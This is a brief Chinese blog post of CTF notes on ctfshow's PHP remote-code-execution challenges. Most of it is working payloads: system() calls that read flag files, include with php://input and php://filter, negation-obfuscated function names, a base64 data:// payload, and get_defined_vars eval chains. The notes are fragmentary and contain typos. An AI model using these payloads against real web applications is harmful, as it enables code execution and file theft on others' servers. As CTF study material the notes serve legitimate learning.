ctfshow--RCE

WEB 29~36--eval

system('ls');
system('cat /fla*.php');
查看源代码

get : include$_GET[b];&b=php://input
post:
回显源代码

先取反再加密
?c=hlight_file(~%99%93%9E%98%D1%8F%97%8F);
原理回溯

?c=echo ls;
?c=echo cat flag,php;

less可代替cat

反引号(`),实际上是调用了shell_exec()函数
关键函数还有
exec()
passthru()
pcntl_exec()
popen()
proc_open()等

c=$nice=include$_GET[1]?>
&1=php://filter/read=convert.base64-encode/resource=flag.php

c=?>
&1=php://filter/read=convert.base64-encode/resource=flag.php

c=include$_GET[1]?>
&1=php://filter/read=convert.base64-encode/resource=flag.php

WEB 37--include

data协议传输base64加密的PHP代码
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

WEB 39为什么加密后执行不了?
.php

WEB 40

?c=print_r(get_defined_vars());
打印出所有变量

print_r(array_pop(next(get_defined_vars())));
打印出

eval(array_pop(next(get_defined_vars())));
同时传递
system('cat flag');

Array ( [_GET] => Array ( [c] => print_r(get_defined_vars()); )
[_POST] => Array ( )
[_COOKIE] => Array () )
[_FILES] => Array ( )
[c] => print_r(get_defined_vars()); )

WEB 387 日志包含

/var/www/html/1.txt')?>

待续……

posted @ 2022-06-28 22:58  LinkPoc  阅读(216)  评论(0)    收藏  举报